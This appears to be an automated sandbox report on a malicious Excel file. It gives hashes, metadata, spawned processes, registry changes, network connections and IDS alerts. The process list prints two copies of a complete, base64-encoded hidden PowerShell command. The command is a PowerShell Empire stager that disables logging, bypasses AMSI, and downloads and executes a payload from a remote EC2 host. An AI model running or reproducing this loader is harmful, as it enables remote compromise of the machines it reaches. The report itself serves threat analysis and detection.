File name: | 4b7d57a50903693a11152f009884e4d7.xls |
Full analysis: | https://app.any.run/tasks/e1f6bfec-a748-48b7-a268-a6327fed26ba |
Verdict: | Malicious activity |
Analysis date: | January 11, 2019, 07:00:43 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Thu Jan 10 14:44:33 2019, Security: 1 |
MD5: | 4B7D57A50903693A11152F009884E4D7 |
SHA1: | 22261F506DACF3A447B5806101C80DCF09C9BD9E |
SHA256: | 60231C2C6E5B3BCFCF3EBD3AA94CE913C4D125DB4206410706917DE9C5A668CD |
SSDEEP: | 1536:RLlcoe5P800Jfr3oRdjZf1/P/CT+FuaWRYwJbb2bO0GsPiaJ:Rje5P800Jfr3kXuaW1bb2bHbK |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
HeadingPairs: |
|
---|---|
TitleOfParts: | Sheet1 |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | Password protected |
ModifyDate: | 2019:01:10 14:44:33 |
CreateDate: | 2015:06:05 18:17:20 |
Software: | Microsoft Excel |
LastModifiedBy: | - |
Author: | - |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
CompObjUserTypeLen: | 31 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3000 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3408 | powershell.exe -NoP -sta -NonI -W Hidden -exec unrestricted -Enc SQBmACgAJABQAFMAVgBFAFIAUwBJAE8ATgBUAGEAQgBMAEUALgBQAFMAVgBFAHIAcwBJAG8ATgAuAE0AYQBqAE8AUgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAUwBTAGUATQBCAEwAeQAuAEcARQB0AFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbABVAGUAKAAkAG4AdQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8AbABsAEUAQwBUAEkAbwBOAFMALgBHAGUAbgBFAFIAaQBjAC4ARABpAGMAdABpAG8AbgBhAFIAWQBbAHMAdABSAGkATgBHACwAUwBZAHMAdABFAE0ALgBPAGIASgBlAGMAVABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AEEAbAB9AEUAbABTAGUAewBbAFMAQwBSAGkAUABUAEIAbABvAEMAawBdAC4AIgBHAGUAVABGAEkARQBgAGwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBBAGwAdQBFACgAJABOAHUAbABMACwAKABOAGUAVwAtAE8AYgBKAEUAQwB0ACAAQwBvAEwAbABFAGMAVABJAE8ATgBzAC4ARwBlAE4AZQBSAGkAYwAuAEgAYQBzAEgAUwBlAFQAWwBTAHQAcgBpAE4ARwBdACkAKQB9AFsAUgBFAGYAXQAuAEEAUwBzAGUAbQBCAEwAWQAuAEcARQBUAFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAHQARgBpAGUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEATAB1AGUAKAAkAG4AVQBMAGwALAAkAFQAcgB1AEUAKQB9ADsAfQA7AFsAUwBZAFMAVABlAG0ALgBOAGUAdAAuAFMARQBSAHYAaQBjAGUAUABPAEkAbgBUAE0AYQBOAEEAZwBlAHIAXQA6ADoARQBYAFAARQBjAHQAMQAwADAAQwBvAE4AVABpAE4AdQBFAD0AMAA7ACQAVwBDAD0ATgBlAHcALQBPAEIASgBFAGMAVAAgAFMAeQBzAFQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwASQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAAMQAwAC4AMAA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAApACAAQQBwAHAAbABlAFcAZQBiAEsAaQB0AC8ANQAzADcALgAzADYAIAAoAEsASABUAE0ATAAsACAAbABpAGsAZQAgAEcAZQBjAGsAbwApACAAQwBoAHIAbwBtAGUALwA1ADYALgAwAC4AMgA5ADIANAAuADgANwAgAFMAYQBmAGEAcgBpAC8ANQAzADcALgAzADYAJwA7ACQAdwBjAC4ASABlAEEAZABFAHIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAVwBDAC4AUAByAE8AeABZAD0AWwBTAFkAUwB0AEUAbQAuAE4AZQBUAC4AVwBlAEIAUgBlAFEAdQBFAFMAdABdADoAOgBEAGUARgBBAHUATAB0AFcAZQBCAFAAcgBPAHgAWQA7ACQAVwBDAC4AUAByAE8AWAB5AC4AQwByAGUAZABFAG4AdABpAEEAbABzACAAPQAgAFsAUwB5AFMAdABlAG0ALgBOAEUAdAAuAEMAUgBFAEQAZQBuAHQAaQBBAGwAQwBhAEMASABFAF0AOgA6AEQARQBGAGEAdQBMAHQATgBlAFQAVwBvAHIAawBDAFIAZQBEAEUATgBUAGkAYQBMAFMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAFkAUwB0AEUATQAuAFQARQB4AHQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAFQAZQBzACgAJwBhADgAMwAzAGMANQA4AGEAOABmADAAZQBiADQAZgA1AGYANABkADUAOQA0AGYAYwBlAGIAMAAxAGUAMgBkAGMAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBHAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AVQBOAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABzAGUAcgA9ACcAaAB0AHQAcAA6AC8ALwBlAGMAMgAtADEAOAAtADIAMQA3AC0AOQAzAC0ANwA2AC4AdQBzAC0AZQBhAHMAdAAtADIALgBjAG8AbQBwAHUAdABlAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAG8AbgAyAC8AcwBpAGcAbgBvAG4AMgAuAGoAcwBwACcAOwAkAHcAYwAuAEgAZQBBAEQAZQBSAFMALgBBAEQARAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AEMAcABZAHoAMwArAG0AOAA3AG4AMABMADcAVQBHAG0AbwBEAHYATwBQAGgATwBjAEsAaABVAD0AIgApADsAJABkAEEAVABhAD0AJABXAEMALgBEAG8AdwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQB2AD0AJABEAGEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABEAEEAVABhAFsANAAuAC4AJABEAGEAVABBAC4ATABFAE4AZwB0AEgAXQA7AC0ASgBPAGkATgBbAEMASABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3296 | powershell.exe -NoP -sta -NonI -W Hidden -exec unrestricted -Enc SQBmACgAJABQAFMAVgBFAFIAUwBJAE8ATgBUAGEAQgBMAEUALgBQAFMAVgBFAHIAcwBJAG8ATgAuAE0AYQBqAE8AUgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAUwBTAGUATQBCAEwAeQAuAEcARQB0AFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbABVAGUAKAAkAG4AdQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8AbABsAEUAQwBUAEkAbwBOAFMALgBHAGUAbgBFAFIAaQBjAC4ARABpAGMAdABpAG8AbgBhAFIAWQBbAHMAdABSAGkATgBHACwAUwBZAHMAdABFAE0ALgBPAGIASgBlAGMAVABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AEEAbAB9AEUAbABTAGUAewBbAFMAQwBSAGkAUABUAEIAbABvAEMAawBdAC4AIgBHAGUAVABGAEkARQBgAGwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBBAGwAdQBFACgAJABOAHUAbABMACwAKABOAGUAVwAtAE8AYgBKAEUAQwB0ACAAQwBvAEwAbABFAGMAVABJAE8ATgBzAC4ARwBlAE4AZQBSAGkAYwAuAEgAYQBzAEgAUwBlAFQAWwBTAHQAcgBpAE4ARwBdACkAKQB9AFsAUgBFAGYAXQAuAEEAUwBzAGUAbQBCAEwAWQAuAEcARQBUAFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAHQARgBpAGUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEATAB1AGUAKAAkAG4AVQBMAGwALAAkAFQAcgB1AEUAKQB9ADsAfQA7AFsAUwBZAFMAVABlAG0ALgBOAGUAdAAuAFMARQBSAHYAaQBjAGUAUABPAEkAbgBUAE0AYQBOAEEAZwBlAHIAXQA6ADoARQBYAFAARQBjAHQAMQAwADAAQwBvAE4AVABpAE4AdQBFAD0AMAA7ACQAVwBDAD0ATgBlAHcALQBPAEIASgBFAGMAVAAgAFMAeQBzAFQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwASQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAAMQAwAC4AMAA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAApACAAQQBwAHAAbABlAFcAZQBiAEsAaQB0AC8ANQAzADcALgAzADYAIAAoAEsASABUAE0ATAAsACAAbABpAGsAZQAgAEcAZQBjAGsAbwApACAAQwBoAHIAbwBtAGUALwA1ADYALgAwAC4AMgA5ADIANAAuADgANwAgAFMAYQBmAGEAcgBpAC8ANQAzADcALgAzADYAJwA7ACQAdwBjAC4ASABlAEEAZABFAHIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAVwBDAC4AUAByAE8AeABZAD0AWwBTAFkAUwB0AEUAbQAuAE4AZQBUAC4AVwBlAEIAUgBlAFEAdQBFAFMAdABdADoAOgBEAGUARgBBAHUATAB0AFcAZQBCAFAAcgBPAHgAWQA7ACQAVwBDAC4AUAByAE8AWAB5AC4AQwByAGUAZABFAG4AdABpAEEAbABzACAAPQAgAFsAUwB5AFMAdABlAG0ALgBOAEUAdAAuAEMAUgBFAEQAZQBuAHQAaQBBAGwAQwBhAEMASABFAF0AOgA6AEQARQBGAGEAdQBMAHQATgBlAFQAVwBvAHIAawBDAFIAZQBEAEUATgBUAGkAYQBMAFMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAFkAUwB0AEUATQAuAFQARQB4AHQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAFQAZQBzACgAJwBhADgAMwAzAGMANQA4AGEAOABmADAAZQBiADQAZgA1AGYANABkADUAOQA0AGYAYwBlAGIAMAAxAGUAMgBkAGMAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBHAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AVQBOAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABzAGUAcgA9ACcAaAB0AHQAcAA6AC8ALwBlAGMAMgAtADEAOAAtADIAMQA3AC0AOQAzAC0ANwA2AC4AdQBzAC0AZQBhAHMAdAAtADIALgBjAG8AbQBwAHUAdABlAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAG8AbgAyAC8AcwBpAGcAbgBvAG4AMgAuAGoAcwBwACcAOwAkAHcAYwAuAEgAZQBBAEQAZQBSAFMALgBBAEQARAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AEMAcABZAHoAMwArAG0AOAA3AG4AMABMADcAVQBHAG0AbwBEAHYATwBQAGgATwBjAEsAaABVAD0AIgApADsAJABkAEEAVABhAD0AJABXAEMALgBEAG8AdwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQB2AD0AJABEAGEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABEAEEAVABhAFsANAAuAC4AJABEAGEAVABBAC4ATABFAE4AZwB0AEgAXQA7AC0ASgBPAGkATgBbAEMASABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | write | Name: | 7#, |
Value: 37232C00B80B0000010000000000000000000000 | |||
(PID) Process: | (3000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (3000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel |
Operation: | write | Name: | MTTT |
Value: B80B0000443541687BA9D40100000000 | |||
(PID) Process: | (3000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | delete value | Name: | 7#, |
Value: 37232C00B80B0000010000000000000000000000 | |||
(PID) Process: | (3000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | delete key | Name: | |
Value: | |||
(PID) Process: | (3000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency |
Operation: | delete key | Name: | |
Value: | |||
(PID) Process: | (3000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (3000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (3000) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\20EBCC |
Operation: | write | Name: | 20EBCC |
Value: 04000000B80B00004600000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00340062003700640035003700610035003000390030003300360039003300610031003100310035003200660030003000390038003800340065003400640037002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C000100000000000000F09542697BA9D401CCEB2000CCEB200000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3000 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE728.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3408 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZPXBN1BQ68U5ODEZGPU7.temp | — | |
MD5:— | SHA256:— | |||
3296 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SNHHFD9FUSIW9SNW1VMT.temp | — | |
MD5:— | SHA256:— | |||
3296 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2140b2.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3408 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3296 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3408 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f0bd.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3000 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE97AE1.emf | emf | |
MD5:59E6E97B3ADDCE7C1C617C18EDBE6294 | SHA256:7BFFBABB961BEFF343EC1617C4FA1E17ED30E7425B32FC18BFCCE87793699F2F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3408 | powershell.exe | GET | — | 18.217.93.76:80 | http://ec2-18-217-93-76.us-east-2.compute.amazonaws.com/logon2/signon2.jsp | US | — | — | shared |
3296 | powershell.exe | GET | — | 18.217.93.76:80 | http://ec2-18-217-93-76.us-east-2.compute.amazonaws.com/logon2/signon2.jsp | US | — | — | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3296 | powershell.exe | 18.217.93.76:80 | ec2-18-217-93-76.us-east-2.compute.amazonaws.com | Amazon.com, Inc. | US | shared |
3408 | powershell.exe | 18.217.93.76:80 | ec2-18-217-93-76.us-east-2.compute.amazonaws.com | Amazon.com, Inc. | US | shared |
Domain | IP | Reputation |
---|---|---|
ec2-18-217-93-76.us-east-2.compute.amazonaws.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3408 | powershell.exe | A Network Trojan was detected | SC BACKDOOR PowerShell Empire - http connection |
3408 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell Empire Request HTTP Pattern |